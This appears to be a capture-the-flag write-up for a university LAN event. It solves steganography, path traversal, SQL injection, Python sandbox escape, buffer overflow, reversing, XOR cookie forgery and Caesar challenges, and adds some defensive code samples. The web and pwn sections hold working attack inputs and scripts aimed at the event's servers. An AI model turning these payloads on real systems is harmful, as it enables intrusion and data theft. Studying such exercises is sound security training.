# IFI-LAN CTF
:)
Flag: `UiO-CTF{h4$h_cOOk13s_4re_m7_f4VoR1t3}`
## Misc
### Hawkeye
“Come Amara, play with me. Let's finish our game of hide and seek…” “Don't hide yourself from the world and don't let the world hide himself from you!”
* https://ctf.uioctf.no/files/2cd9655aa805f7835634007c07de56d4/WSG.jpg
```
$ steghide extract -sf WSG.jpg -p watchcom -xf output.txt
the file "output.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "output.txt".
oklien@oklien-thinkpad:~/Documents/ctf/ifi$
oklien@oklien-thinkpad:~/Documents/ctf/ifi$ cat output.txt
�PNG
[binary PNG data omitted]
oklien@oklien-thinkpad:~/Documents/ctf/ifi$ mv output.txt output.png
oklien@oklien-thinkpad:~/Documents/ctf/ifi$ file output.png
output.png: PNG image data, 325 x 21, 8-bit/color RGB, non-interlaced
```
Flag: `UiO-CTF{i_donT_alwa7s_h1de_but_wh3n_i_d0_i_st3ghide}`
### Burglar
easy
Author: PewZ
Find every file with size 1337, sort the filenames alphabetically and put together the first character from each file (contents) to form the flag.
There will be a couple of files with 1337 bytes that aren't correct.
`ssh -p 9999 ctf@burglar.uioctf.no` The password is ctf.
```
$ find / -size 1337c
```
They are located in /opt/uio/ and /etc/uio.
```
$ for i in $(ls -1 | sort -f); do head -c1 $i; done
UiO-CTF{shwoo_fft_ah_tetmrnilaw_zirard}y
```
```
0_ctf.txt
1_ctf.txt
2_ctf.txt
3_ctf.txt
4_ctf.txt
5_ctf.txt
6_ctf.txt
7_ctf.txt
8_ctf.txt
9_ctf.txt
A_ctf.txt
a_ctf.txt
B_ctf.txt
b_ctf.txt
C_ctf.txt
c_ctf.txt
D_ctf.txt
d_ctf.txt
E_ctf.txt
e_ctf.txt
F_ctf.txt
f_ctf.txt
G_ctf.txt
g_ctf.txt
H_ctf.txt
h_ctf.txt
I_ctf.txt
i_ctf.txt
J_ctf.txt
j_ctf.txt
K_ctf.txt
k_ctf.txt
L_ctf.txt
l_ctf.txt
M_ctf.txt
m_ctf.txt
N_ctf.txt
n_ctf.txt
O_ctf.txt
o_ctf.txt
```
Lowercase comes before uppercase, so just swap them around.
Flag: `UiO-CTF{show_off_that_terminal_wizardry}`
### Dana Bakeri 4 Life
easy
Author: Deadwolf
How does Dana bakery make such great food? We found this meme, which may reveal their secrets 🤔
Photo: MysticSheik
* https://ctf.uioctf.no/files/1bb12acfd1ca8255f262079303d1e6ac/varme_litt.png
```
$ zsteg -a varme_litt.png
imagedata .. text: "\n\n\n###&&&"
b1,rgb,msb,xy .. text: "$Ib;$Gn#"
b2,b,msb,xy .. text: "er8UUU,8"
b3,rgb,lsb,xy .. text: "G&${P:s9"
b4,r,lsb,xy .. text: "vgxDUVfUfw"
b4,g,lsb,xy .. text: "WDDDDeT3\"fT2"
b4,b,lsb,xy .. text: "%yDC2\"Ex"
b4,b,msb,xy .. text: "Us@wwwwL"
b5,bgr,lsb,xy .. file: PGP\011Secret Key -
b6,b,msb,xy .. text: "][WeU7M]UM7L]"
b6,bgr,msb,xy .. text: "6]Z5~Y3e]V"
b8,r,lsb,xy .. text: "!UiO-CTF{Club_Mate_+_Varme_Litt?}\n989;<=86778:;<??@@@?><;:865678;:99;<>@;;;99999>==<;:99==<;:9875689;:::99977777;:8778:;<<<<:753?><;:;=<9987664488888888=>><98:<9;=?A@@?A=955320/220-(&'\"$&(-024555443335689:9766677798899:;<<==<<:986537547:<;899::;<<<?=:878:<"
...
```
Flag: `UiO-CTF{Club_Mate_+_Varme_Litt?}`
## Web
### taco3
https://localtaco3.uioctf.no/?taco=../../../../../../../dev/fd/../environ
`/dev/fd` is a symlink to `/proc/self/fd` (the process's file descriptors), so `/dev/fd/../environ` resolves to `/proc/self/environ`.
Flag: `UiO-CTF{reading_the_environment_like_a_pro!!!}`
### You shall OR pass
Author: marksome & Inj3ctor G4dget
You might need an 💉 to get past this login form.
* https://youshallorpass.uioctf.no
With: `' OR 1=1`
```
SQL Error:
Syntax error in SELECT id FROM users WHERE name=''' OR 1=1' and HASH('' OR 1=1', 'sha1') = passwd
```
The correct SQL injection is then: ` ') or 1--`
Flag: `UiO-CTF{G0_G4dget_G0}`
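The error message shows the username with its quote doubled but the password placed raw inside `HASH('...')`, which is why the input has to close that call. The following is an added example, not the challenge's code: it rebuilds that query shape in an in-memory SQLite database and puts the concatenated query beside a parameterized one. The table contents, the `HASH` stand-in and the function names are assumptions.

```python
import hashlib
import sqlite3

def make_db():
    """In-memory stand-in for the challenge database (constructed data)."""
    db = sqlite3.connect(":memory:")
    # SQLite has no HASH(); register one. narg=-1 accepts any argument
    # count, so the injected one-argument call still executes.
    db.create_function(
        "HASH", -1, lambda *a: hashlib.sha1(str(a[0]).encode()).hexdigest())
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, passwd TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)",
               (hashlib.sha1(b"constructed-password").hexdigest(),))
    return db

def login_concat(db, name, password):
    """Query shape from the error message: name escaped, password raw."""
    sql = ("SELECT id FROM users WHERE name='" + name.replace("'", "''") +
           "' and HASH('" + password + "', 'sha1') = passwd")
    return db.execute(sql).fetchall()

def login_param(db, name, password):
    """Same check with bound parameters: input never becomes SQL syntax."""
    sql = "SELECT id FROM users WHERE name=? and HASH(?, 'sha1') = passwd"
    return db.execute(sql, (name, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "') or 1--"  # the input from the write-up
    print("concatenated :", login_concat(db, "x", payload))
    print("parameterized:", login_param(db, "x", payload))
    print("valid login  :", login_param(db, "admin", "constructed-password"))
```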
## PWN
### Calculator
I bet you can't hack my calculator!
```
nc ctf.uioctf.no 1337
-----------------
Available commands:
- calc: calculator
- quit: quit
>calc
Input math (or 'q' to exit to menu):
>e
name 'e' is not defined
>import sys
invalid syntax (<string>, line 1)
Input math (or 'q' to exit to menu):
>__import__('os')
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Input math (or 'q' to exit to menu):
>os.system('ls')
flag.txt
server.py
0
Input math (or 'q' to exit to menu):
>os.system('cat flag.txt')
UiO-CTF{My_Calculator_Is_Not_Secure??}0
Input math (or 'q' to exit to menu):
>/opt/wrap.sh: line 2: 274 Alarm clock python2 ./server.py
```
Flag: `UiO-CTF{My_Calculator_Is_Not_Secure??}`
### Overflow 1
easy
Author: maritio_o
Only the best type of LANers gets the special token of appreciation. Can you prove you're one of the awesomest LANers?
Here, take the binary file and the source code below for local pwning.
To do remote pwning and get the real flag, connect to the remote server:
nc overflow1.uioctf.no 6000
```
$ python -c 'print "A" * 32 + "\x01\x00\x00\x00"' | nc overflow1.uioctf.no 6000
Welcome to the awesomest LAN party!
What is your name? I will help you get registered.
>Participant registered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Type: 1
Oh I didn't know. You are one of them.. The awesomest LAN participants...
Here, take this!
> UiO-CTF{CTFers_are_the_most_awesome_LANers}
```
Flag: `UiO-CTF{CTFers_are_the_most_awesome_LANers}`
### Secure Calculator
This time I've secured my calculator with super strong hacker protection.
```
nc ctf.uioctf.no 1338
-----------------
Available commands:
- play (0): start math quiz
- calc (1): calculator [authorized members only!]
- quit (2): quit
>1
Not authorized to use calculator :/
-----------------
Available commands:
- play (0): start math quiz
- calc (1): calculator [authorized members only!]
- quit (2): quit
>0
What is 50 + 70?
>120
What is 57 + 62?
>
```
```python
from pwn import *

# context.log_level = 'debug'
c = remote('ctf.uioctf.no', 1338)
c.recvuntil(b'>')
c.sendline(b'0')  # start the math quiz

while True:
    question = c.recvline().decode()
    print(question)
    if "authorized" in question:
        # Quiz is over: hand the session to the user
        c.interactive()
        break
    # Question format: "What is 50 + 70?"
    parts = question.split(' ')
    num1 = parts[2]
    num2 = parts[4].replace('?', '').strip()
    answer = int(num1) + int(num2)
    print(answer)
    c.sendline(str(answer).encode())
    c.recvuntil(b'>')

c.close()
```
```
>$ ().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read()
```
Flag: `UiO-CTF{Quick_Maths_For_Quick_Hackers!}`
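The transcripts for Calculator and Secure Calculator both show the input line being evaluated as a Python expression. As an added example, not the challenge's `server.py` (which the write-up does not show), this Python 3 sketch parses the input with `ast` and evaluates only numeric literals and arithmetic operators; the function names are assumptions.

```python
import ast
import operator

# Only these node types are evaluated; everything else is rejected.
_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
            ast.Mult: operator.mul, ast.Div: operator.truediv,
            ast.Mod: operator.mod}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}

def safe_calc(expr, max_len=100):
    """Evaluate +, -, *, /, % over numeric literals; ValueError otherwise."""
    if len(expr) > max_len:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError:
        raise ValueError("not an expression")
    return _eval(tree.body)

def _eval(node):
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval(node.left), _eval(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval(node.operand))
    # Names, calls, attribute access, subscripts, ... all end up here.
    raise ValueError("disallowed syntax: " + type(node).__name__)

def try_calc(expr):
    """Return the result, or the rejection message, for display."""
    try:
        return safe_calc(expr)
    except (ValueError, ZeroDivisionError) as exc:
        return "rejected: %s" % exc

if __name__ == "__main__":
    # Inputs taken from the two transcripts above, plus plain arithmetic.
    for line in ["50 + 70", "-(57 + 62) * 2", "e", "import sys",
                 "__import__('os')",
                 "().__class__.__bases__[0].__subclasses__()[40]"
                 "('flag.txt').read()"]:
        print(repr(line), "->", try_calc(line))
```

Exponentiation is left out on purpose, since a short input such as a tower of powers can exhaust CPU and memory.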
### Pwnylicious
Author: maritio_o (Sopra Steria)
Hey yall! This binary is so pwnylicious.
Take the binary for local pwning, and source code for reversing.
Check out the binary file and the source code below!
To do remote pwning and get the real flag, connect to the remote server:
`nc pwnylicious.uioctf.no 6004`
```
$ readelf -a pwnylicious | grep pwn
40: 00000000 0 FILE LOCAL DEFAULT ABS pwnylicious.c
54: 08048556 43 FUNC GLOBAL DEFAULT 14 be_pwnylicious
```
`be_pwnylicious` is at `0x08048556`.
```
python -c 'print "A" * 32 + "\x56\x85\x04\x08"' | nc pwnylicious.uioctf.no 6004
Did you know Sopra Steria just opened their SOC?
Do you know who their first customer is?
>WRONG! You died.
UiO-CTF{Sopra_Steria_also_knows_how_to_pwn:))))}
/opt/wrap.sh: line 2: 217 Segmentation fault (core dumped) ./pwnylicious
```
Flag: `UiO-CTF{Sopra_Steria_also_knows_how_to_pwn:))))}`
### Overflow 2
easy
Author: maritio_o
This one requires even more control over how the stack works!
Take the binary file and the source code below for local pwning.
To do remote pwning and get the real flag, connect to the remote server:
nc overflow2.uioctf.no 6001
```c
#include <stdint.h>  /* int8_t, uint32_t */

#define GAMER 0
#define CTFER 1

struct participant {
    char answer[48];
    short userid;
    char gender;
    int8_t type;
    int birth_year;
    long long birth_date;
    float weight;
    uint32_t phone_number;
};

/* Every field after answer[] must hold the expected value. */
int security_check(struct participant participant)
{
    if (participant.userid != 1337) {
        return 0;
    }
    if (participant.gender != 'F') {
        return 0;
    }
    if (participant.type != CTFER) {
        return 0;
    }
    if (participant.birth_year != 1337) {
        return 0;
    }
    if (participant.birth_date != 13371337) {
        return 0;
    }
    if (participant.weight != 13.37f) {
        return 0;
    }
    if (participant.phone_number != 98761234) {
        return 0;
    }
    return 1;
}
```
```
$ python -c 'print "A" * 48 + "\x39\x05" + "\x46" + "\x01" + "\x39\x05\x00\x00" + "\xc9\x07\xcc\x00\x00\x00\x00\x00" + "\x85\xeb\x55\x41" + "\x12\xfa\xe2\x05"' | nc overflow2.uioctf.no 6001
__________
| __ __ |
| | || | |
| | || | |
| |__||__| |
| __ __()|
| | || | |
| | || | |
| | || | |
| | || | |
| |__||__| |
__________ |__________| _________
Want to enter this cool door?
>Participant:
User ID: 1337
Gender: 70
Type: 1
Birth year: 1337
Birth date: 13371337
Weight: 13.370000
Phone number: 98761234
COOL. Security check done. You may enter.
And don't forget to take this flag!> UiO-CTF{pwn_is_super_fun_when_understanding_the_stack!!}
```
Flag: `UiO-CTF{pwn_is_super_fun_when_understanding_the_stack!!}`
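The payload above is the struct written out field by field in little-endian order. As an added example (not part of the original write-up), this decodes the same bytes with Python's `struct` module; the format string and function names are assumptions derived from the struct definition shown, and no padding is needed because every field starts on a multiple of its own size.

```python
import struct

# struct participant from the source above, little-endian, no padding:
#   48s answer | h userid | c gender | b type | i birth_year
#   | q birth_date | f weight | I phone_number
LAYOUT = struct.Struct("<48shcbiqfI")
FIELDS = ("answer", "userid", "gender", "type", "birth_year",
          "birth_date", "weight", "phone_number")

# The bytes from the write-up's command, copied as written there.
PAYLOAD = (b"A" * 48 + b"\x39\x05" + b"\x46" + b"\x01" + b"\x39\x05\x00\x00"
           + b"\xc9\x07\xcc\x00\x00\x00\x00\x00" + b"\x85\xeb\x55\x41"
           + b"\x12\xfa\xe2\x05")

def decode_participant(data):
    """Map each input byte range onto the struct field it lands in."""
    if len(data) < LAYOUT.size:
        raise ValueError("need %d bytes, got %d" % (LAYOUT.size, len(data)))
    return dict(zip(FIELDS, LAYOUT.unpack(data[:LAYOUT.size])))

def field_offsets():
    """Byte offset of every field, computed from the format prefix."""
    codes = ["48s", "h", "c", "b", "i", "q", "f", "I"]
    return {name: struct.calcsize("<" + "".join(codes[:i]))
            for i, name in enumerate(FIELDS)}

def passes_security_check(p):
    """Mirror of security_check(); weight is compared as a 32-bit float."""
    as_f32 = struct.unpack("<f", struct.pack("<f", 13.37))[0]
    return (p["userid"] == 1337 and p["gender"] == b"F" and p["type"] == 1
            and p["birth_year"] == 1337 and p["birth_date"] == 13371337
            and p["weight"] == as_f32 and p["phone_number"] == 98761234)

if __name__ == "__main__":
    person = decode_participant(PAYLOAD)
    for name, off in field_offsets().items():
        print("%-12s offset %2d  %r" % (name, off, person[name]))
    print("security_check:", passes_security_check(person))
```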
---
## Reversing
### Pinned Pizza
Author: Dulte
They are tired of us stealing their pizza, so they have hidden it inside a safe with a PIN. We have got hold of the program. Can you find the PIN?
With the PIN you can get the flag from here
nc pizzapin.uioctf.no 5001
* https://ctf.uioctf.no/files/f45aefff6da6d9dc430af6c68312767f/pizzapin
Reversed the binary; the `get_pin()` function:
```c
#include <stdio.h>

int get_pin() {
    int var_8 = 0x4;
    for (int var_4 = 0x32; var_4 <= 0x34; var_4 = var_4 + 0x1) {
        var_8 = var_8 + var_4;
    }
    /* Subtraction binds tighter than <<; the parentheses make that explicit. */
    int rax = ((var_8 - 0xa) << 0x2) + (var_8 - 0xa) + ((var_8 - 0xa) << 0x2) + (var_8 - 0xa);
    return rax;
}

int main() {
    printf("PIN %d\n", get_pin());
    return 0;
}
```
Ran it, got: 1470
```
$ nc pizzapin.uioctf.no 5001
Enter Pin to Get Pizza!
1470
You Found The Pizza!
UiO-CTF{no_pin_can_stop_me}
```
Flag: `UiO-CTF{no_pin_can_stop_me}`
### The Key to Everlasting Pizza
Author: Dulte
The pizza shop has found a more sophisticated way of hiding the pizza. They now have a way of generating different passwords that give you pizza. Can you crack the code and generate the passwords?
nc pizzakey.uioctf.no 5000
* https://ctf.uioctf.no/files/6a257a403a887e4cfecca62ed0eb4fc2/pizzakey
### Rusty
https://ctf.uioctf.no/files/0a45908b7aa1ff19590f054414d7738f/sikkerhet.tar.bz2
## Web
### Military Grate Encryption
API URL: https://military.uioctf.no/
API Swagger: https://military.uioctf.no/api/
#### Typescript given:
```ts
import { Controller, Get, Req, Res, HttpStatus } from '@nestjs/common';
import { Request, Response } from 'express';
import { ApiUseTags } from '@nestjs/swagger';
import { Secret, Flag } from '../constants/secrets';

@ApiUseTags('flag')
@Controller('flag')
export class FlagController {
  @Get('cookie')
  getToken() {
    return 'cCwKBi1VJBY5Jh8FV1AJWH1KVnpdR2Njd0ZbdgFE';
  }

  @Get('info')
  getInfo(@Req() req: Request, @Res() res: Response) {
    let b64cookie = new Buffer(req.headers.cookie, 'base64');
    /* Decode base64 */
    let cookie = b64cookie.toString();
    if (!cookie || cookie.length < 30) {
      res.status(HttpStatus.UNAUTHORIZED).send('Unauthorized');
      return;
    }
    /* Decrypting our military grade encryption */
    let decryptedCookie = this.decrypt(cookie, 30);
    console.log('Decrypted info cookie: ', decryptedCookie);
    if (decryptedCookie.includes('Scope=') && decryptedCookie.includes('read:info')) {
      res.status(HttpStatus.OK).send('This is some cool info.');
      return;
    }
    res.status(HttpStatus.UNAUTHORIZED).send('Unauthorized');
  }

  @Get('flag')
  getFlag(@Req() req: Request, @Res() res: Response) {
    let b64cookie = new Buffer(req.headers.cookie, 'base64');
    /* Decode base64 */
    let cookie = b64cookie.toString();
    if (!cookie || cookie.length < 30) {
      res.status(HttpStatus.UNAUTHORIZED).send('Unauthorized');
      return;
    }
    /* Decrypting our military grade encryption */
    let decryptedCookie = this.decrypt(cookie, 30);
    console.log('Decrypted flag cookie: ', decryptedCookie);
    if (decryptedCookie.includes('Scope=') && decryptedCookie.includes('read:flag')) {
      res.status(HttpStatus.OK).send(Flag);
      return;
    }
    res.status(HttpStatus.UNAUTHORIZED).send('Unauthorized');
  }

  decrypt = function(cookie: string, length: number): string {
    /* Strings in Javascript are immutable.
     * Convert string to array for XOR encryption */
    let cookieArray: string[] = cookie.split("");
    for (let i = 0; i < length; i++) {
      /* XOR operation (^) requires integer */
      let xor = Secret.charCodeAt(i) ^ cookie.charCodeAt(i);
      cookieArray[i] = String.fromCharCode(xor);
    }
    return cookieArray.join('');
  };
}
```
#### Solution
Python script for deriving the key via known plaintext attack.
Known plaintext: `Scope= read:flag`
```python
from base64 import b64decode, b64encode

# "Scope=", 15 spaces of padding, then the scope value: 30 bytes in total
plain_info = "Scope=" + " " * 15 + "read:info"  # 30 bytes string
plain_flag = "Scope=" + " " * 15 + "read:flag"  # 30 bytes string
cookie = b64decode("cCwKBi1VJBY5Jh8FV1AJWH1KVnpdR2Njd0ZbdgFE").decode()

# derive key for /flag/info
key_list = []
for i in range(len(plain_info)):
    b = ord(plain_info[i]) ^ ord(cookie[i])
    key_list.append(b)
key_bytes = "".join(map(chr, key_list))
key_base64 = b64encode(key_bytes.encode())
print("Cookie (info): '{}'".format(key_base64.decode()))

# key verification for info
plain_list = []
for i in range(len(key_bytes)):
    b = ord(key_bytes[i]) ^ ord(cookie[i])
    plain_list.append(b)
print("Verified plaintext (info): '{}'".format("".join(map(chr, plain_list))))

# derive key for /flag/flag
key_list = []
for i in range(len(plain_flag)):
    b = ord(plain_flag[i]) ^ ord(cookie[i])
    key_list.append(b)
key_bytes = "".join(map(chr, key_list))
key_base64 = b64encode(key_bytes.encode())
print("Cookie (flag): '{}'".format(key_base64.decode()))

# key verification for flag
plain_list = []
for i in range(len(key_bytes)):
    b = ord(key_bytes[i]) ^ ord(cookie[i])
    plain_list.append(b)
print("Verified plaintext (flag): '{}'".format("".join(map(chr, plain_list))))
```
##### Output from script
```
Cookie (info): 'I09ldkhoBDYZBj8ld3ApeF1qdlp9NQYCE3wyGGcr'
Verified plaintext (info): 'Scope= read:info'
Cookie (flag): 'I09ldkhoBDYZBj8ld3ApeF1qdlp9NQYCE3w9GmAj'
Verified plaintext (flag): 'Scope= read:flag'
```
##### Get the flag
```
$ curl -X GET https://military.uioctf.no/flag/flag -H "accept: application/json" --cookie "base64=I09ldkhoBDYZBj8ld3ApeF1qdlp9NQYCE3w9GmAj"
$ curl -X GET https://military.uioctf.no/flag/info -H "accept: application/json" --cookie "base64=I09ldkhoBDYZBj8ld3ApeF1qdlp9NQYCE3wyGGcr"
```
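The controller decrypts the cookie by XOR with a fixed secret and never checks its integrity, so cookie bytes can be changed without the server noticing. As an added example (not the challenge's code or the author's script), this compares that scheme with an HMAC-authenticated cookie under the same tampering; the secret, the MAC key and the function names are constructed for the illustration.

```python
import base64
import hashlib
import hmac

SECRET = bytes(range(65, 95))                 # constructed 30-byte stand-in for Secret
MAC_KEY = b"constructed-hmac-key"             # assumption, not on the page
INFO = b"Scope=" + b" " * 15 + b"read:info"   # 30-byte scope string

def xor(data, key):
    return bytes(a ^ b for a, b in zip(data, key))

def issue_xor(plain):
    """Cookie in the form the controller expects: base64(plain XOR Secret)."""
    return base64.b64encode(xor(plain, SECRET))

def check_xor(cookie, scope):
    """Mirror of the controller's test: decrypt, then substring match."""
    plain = xor(base64.b64decode(cookie), SECRET)
    return b"Scope=" in plain and scope in plain

def issue_mac(plain):
    """Scope in the clear plus an HMAC-SHA256 tag: integrity, not secrecy."""
    tag = hmac.new(MAC_KEY, plain, hashlib.sha256).digest()
    return base64.b64encode(plain + tag)

def check_mac(cookie, scope):
    raw = base64.b64decode(cookie)
    plain, tag = raw[:-32], raw[-32:]
    good = hmac.new(MAC_KEY, plain, hashlib.sha256).digest()
    # Verify the tag in constant time before looking at the contents.
    return hmac.compare_digest(tag, good) and scope in plain

def tamper(cookie, old, new, offset):
    """Integrity test: change cookie bytes without any key (c ^= old ^ new)."""
    raw = bytearray(base64.b64decode(cookie))
    for i, (o, n) in enumerate(zip(old, new)):
        raw[offset + i] ^= o ^ n
    return base64.b64encode(bytes(raw))

if __name__ == "__main__":
    off = INFO.index(b"info")
    weak = tamper(issue_xor(INFO), b"info", b"flag", off)
    strong = tamper(issue_mac(INFO), b"info", b"flag", off)
    print("tampered XOR cookie accepted :", check_xor(weak, b"read:flag"))
    print("tampered HMAC cookie accepted:", check_mac(strong, b"read:flag"))
    print("untouched HMAC cookie valid  :", check_mac(issue_mac(INFO), b"read:info"))
```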
## Crypto
### Weapons of Mass Encryption
easy challenging
Author: cyanboy
Decrypt all the nuclear launch codes!
`nc ancient.uioctf.no 6969`
After manual testing: ROT22. Needs to be automated.
```python
from pwn import *

alph = "abcdefghijklmnopqrstuvwxyz"
# Caesar shift of 22 (found by manual testing)
rot22_table = dict(zip(alph, alph[22:] + alph[:22]))  # lowercase character mappings
rot22_table.update((ch.upper(), rot22_table[ch].upper()) for ch in alph)  # uppercase

def rot22(s):
    # Characters outside the alphabet (spaces) pass through unchanged
    return "".join(rot22_table.get(ch, ch) for ch in s)

context.log_level = 'debug'
c = remote('ancient.uioctf.no', 6969)
c.recvuntil(b'START DECRYPTION')
while True:
    # Each prompt looks like "[0x7f]: <ciphertext> ->"
    line = c.recvuntil(b'->').decode()
    print(line)
    ciphertext = line.split(': ')[1].replace(' ->', '')
    print(ciphertext)
    print(rot22(ciphertext))
    c.sendline(rot22(ciphertext).encode())
c.close()
```
After running it for a while:
```
[0x7f]: wempjmwl lsvwi kecep gexxpi ->
wempjmwl lsvwi kecep gexxpi
sailfish horse gayal cattle
[DEBUG] Sent 0x1c bytes:
'sailfish horse gayal cattle\n'
[DEBUG] Received 0x36 bytes:
'DECRYPTION SUCCESSFUL\n'
'UiO-CTF{hail_to_the_caesar_bby}\n'
```
Flag: `UiO-CTF{hail_to_the_caesar_bby}`